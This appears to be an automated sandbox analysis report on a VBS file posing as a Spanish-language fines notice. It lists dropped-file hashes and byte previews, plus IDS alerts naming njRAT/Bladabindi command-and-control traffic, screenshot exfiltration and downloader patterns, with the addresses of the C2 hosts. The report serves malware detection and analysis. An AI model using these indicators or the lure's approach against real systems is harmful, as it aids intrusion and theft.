                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6222
                                                            Entropy (8bit):3.711704485190179
                                                            Encrypted:false
                                                            SSDEEP:48:JS65LCmbU2K+DaukvhkvklCyw6n2kCXosElzISogZoBECXosElIISogZoV1:c8LCTonkvhkvCCt2CXosE7HRCXosECHi
                                                            MD5:C33E4787669FDEB082B64C7A521F18B7
                                                            SHA1:2C4E1BA17ADCC8A9CC430CAD8E47BC5A6C05BE32
                                                            SHA-256:A064ED19A842EDA977FBE8319D2E4CF121F2587E29F001D54F10E77575D79E06
                                                            SHA-512:EFCBE99FFD68720746CE24ADA4B88D4399966017CC28762536DDE5EC918C7F9A75C9046F3211343046E5BF7E63BF3F2985AD88617B7AE7B01CE4FB5691551F54
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......JO......y..........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl8Y=.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....8Y;...Roaming.@......DWSl8Y;.....C.....................:m..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl8Y8.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl8Y8.....E.....................,.D.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl8Y8.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl8Y8.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6222
                                                            Entropy (8bit):3.711704485190179
                                                            Encrypted:false
                                                            SSDEEP:48:JS65LCmbU2K+DaukvhkvklCyw6n2kCXosElzISogZoBECXosElIISogZoV1:c8LCTonkvhkvCCt2CXosE7HRCXosECHi
                                                            MD5:C33E4787669FDEB082B64C7A521F18B7
                                                            SHA1:2C4E1BA17ADCC8A9CC430CAD8E47BC5A6C05BE32
                                                            SHA-256:A064ED19A842EDA977FBE8319D2E4CF121F2587E29F001D54F10E77575D79E06
                                                            SHA-512:EFCBE99FFD68720746CE24ADA4B88D4399966017CC28762536DDE5EC918C7F9A75C9046F3211343046E5BF7E63BF3F2985AD88617B7AE7B01CE4FB5691551F54
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......JO......y..........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl8Y=.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....8Y;...Roaming.@......DWSl8Y;.....C.....................:m..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl8Y8.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl8Y8.....E.....................,.D.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl8Y8.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl8Y8.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6222
                                                            Entropy (8bit):3.711704485190179
                                                            Encrypted:false
                                                            SSDEEP:48:JS65LCmbU2K+DaukvhkvklCyw6n2kCXosElzISogZoBECXosElIISogZoV1:c8LCTonkvhkvCCt2CXosE7HRCXosECHi
                                                            MD5:C33E4787669FDEB082B64C7A521F18B7
                                                            SHA1:2C4E1BA17ADCC8A9CC430CAD8E47BC5A6C05BE32
                                                            SHA-256:A064ED19A842EDA977FBE8319D2E4CF121F2587E29F001D54F10E77575D79E06
                                                            SHA-512:EFCBE99FFD68720746CE24ADA4B88D4399966017CC28762536DDE5EC918C7F9A75C9046F3211343046E5BF7E63BF3F2985AD88617B7AE7B01CE4FB5691551F54
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......JO......y..........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl8Y=.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....8Y;...Roaming.@......DWSl8Y;.....C.....................:m..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl8Y8.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl8Y8.....E.....................,.D.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl8Y8.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl8Y8.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6222
                                                            Entropy (8bit):3.716133014091462
                                                            Encrypted:false
                                                            SSDEEP:48:lu965LCmbU23+LaukvhkvklCyw6n2kCXosElIISogZoBECXosElIISogZoV1:G8LCTdvkvhkvCCt2CXosECHRCXosECHi
                                                            MD5:0EA11BA3C830DC9D0E6E8C23BF853CDB
                                                            SHA1:5712CCB29FAF7C5019548A987FDD39A073A85C9D
                                                            SHA-256:FA554F930E8D4D1EA76092BD20C687D3735B68315696581018B7507AFBEE2CD4
                                                            SHA-512:FB58CE8B00A15D81CAC8433F3E770B682EA42931C28B404B7472009C0131EAD6DEF4C1B59664F18DF77F99B5CDCBE9DAB8C9AD52B3BE5E2337B5C59F5D972B3E
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ...d.............z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......JO......!.........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl8Y=.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....8Y;...Roaming.@......DWSl8Y;.....C.....................:m..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl8Y8.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl8Y8.....E.....................,.D.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl8Y8.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl8Y8.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSl8YG.....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl8YL.....q...........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6222
                                                            Entropy (8bit):3.711704485190179
                                                            Encrypted:false
                                                            SSDEEP:48:JS65LCmbU2K+DaukvhkvklCyw6n2kCXosElzISogZoBECXosElIISogZoV1:c8LCTonkvhkvCCt2CXosE7HRCXosECHi
                                                            MD5:C33E4787669FDEB082B64C7A521F18B7
                                                            SHA1:2C4E1BA17ADCC8A9CC430CAD8E47BC5A6C05BE32
                                                            SHA-256:A064ED19A842EDA977FBE8319D2E4CF121F2587E29F001D54F10E77575D79E06
                                                            SHA-512:EFCBE99FFD68720746CE24ADA4B88D4399966017CC28762536DDE5EC918C7F9A75C9046F3211343046E5BF7E63BF3F2985AD88617B7AE7B01CE4FB5691551F54
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......JO......y..........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl8Y=.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....8Y;...Roaming.@......DWSl8Y;.....C.....................:m..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl8Y8.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl8Y8.....E.....................,.D.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl8Y8.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl8Y8.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6222
                                                            Entropy (8bit):3.7142966727309394
                                                            Encrypted:false
                                                            SSDEEP:48:lua65LCmbU23+LaukvhkvklCyw6n2kCXosElIISogZoBECXosElIISogZoV1:J8LCTdvkvhkvCCt2CXosECHRCXosECHi
                                                            MD5:2DB96E8084555BC025C18E4FA300E9FC
                                                            SHA1:551F2F89473CE044505896433ABA8A42EBAD05CE
                                                            SHA-256:2298FDD413126E4F42520FCC495F64A969F0AA8A971C17445B1844E0750D3E12
                                                            SHA-512:812AB7279838ACF50158BA5CAAFBECAAAADADD47896020E18ADD60D22ACD380F2022A2F7F975AA4AE017E0DAAB948E2DCEB6225FCA398E09FB16DDF10D20AD77
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ...d.............z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......JO......n..........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl8Y=.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....8Y;...Roaming.@......DWSl8Y;.....C.....................:m..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl8Y8.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl8Y8.....E.....................,.D.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl8Y8.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl8Y8.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSl8YG.....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl8YL.....q...........
                                                            File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Entropy (8bit):3.5560413891125555
                                                            TrID:
                                                            • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                            • MP3 audio (1001/1) 32.22%
                                                            • Lumena CEL bitmap (63/63) 2.03%
                                                            • Corel Photo Paint (41/41) 1.32%
                                                            File name:Oficio notificacion multas y sanciones.vbs
                                                            File size:576'314 bytes
                                                            MD5:5d0e059a9d852fbaa853170862b948f7
                                                            SHA1:89c0faf4ba6531b3e9c5550f53280e02492c770d
                                                            SHA256:838e276f65a1dcdf9fd0292c3c7cd8b6c3f6c2ed940adcc663d68dd84a40e2c4
                                                            SHA512:9ed84239c4277d19e8ea127282cd06d941293278f90bc25a98ddda2281dce8ce17295617e55216af925db77c78457c4ea10a8f9d24e9ecdfc94aa710f40df7a4
                                                            SSDEEP:1536:kmmmmmmmmmmmmmmmmmmyFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFB:4HY
                                                            TLSH:09C4BD4667EB5509B1B72F586D7A50740BA33E5A99BCC69C01CCA81E0FF3A40C865BF3
                                                            File Content Preview:..........'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'. .m.e.x.i.c.a.n.o. .'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'. .........'. .P.r.i.n.t. .u.s.a.g.e. .b.a.S.T.o.....'.............'. .I.n.s.t.a.l.l. .P.r.o.v.i.d.e.r.s.................'. .U.n.i.n.s.t.a
                                                            Icon Hash:68d69b8f86ab9a86
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-09-24T23:42:10.278503+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54970876.76.21.22443TCP
                                                            2024-09-24T23:42:13.919461+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54971176.76.21.22443TCP
                                                            2024-09-24T23:42:24.538051+02002033132ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:42:24.543018+02002825563ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (inf)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:42:30.780426+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:09.823180+02002825565ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity Sending Screenshot (CAP)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:13.222752+02002825565ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity Sending Screenshot (CAP)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:16.816363+02002825566ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (CAP)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:20.048232+02002825565ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity Sending Screenshot (CAP)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:20.415585+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:21.823270+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:22.955511+02002825565ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity Sending Screenshot (CAP)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:26.275661+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:26.448004+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:27.447593+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:27.572536+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:27.874346+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:27.879287+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:27.884284+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:27.890574+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:27.895424+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:27.900265+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:27.905133+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:27.909984+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:27.917729+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:27.922522+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:27.938041+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.006779+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.078828+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.083729+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.089272+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.094773+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.102648+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.107699+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.112675+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.118220+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.125430+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.130615+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.135572+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.141947+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.146951+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.151855+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.156685+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.162693+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.167715+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.189826+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.194891+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.199734+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.204631+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.209478+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.215309+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.220171+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.225084+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.232142+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.237093+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.242013+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.246929+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.251785+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.260716+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.265623+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.270502+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.281059+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.320454+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.325448+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.330529+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.336799+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.344731+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.350336+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.356134+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.362179+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.368022+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.393404+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.399029+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.404239+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.410456+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.415443+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.420374+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.426867+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.431776+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.436637+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.443695+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.448627+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.453477+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.458417+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.463317+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.468119+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.473049+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.477902+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.482840+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.487734+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.493974+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.498863+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.503742+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.510071+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.517350+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.522195+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
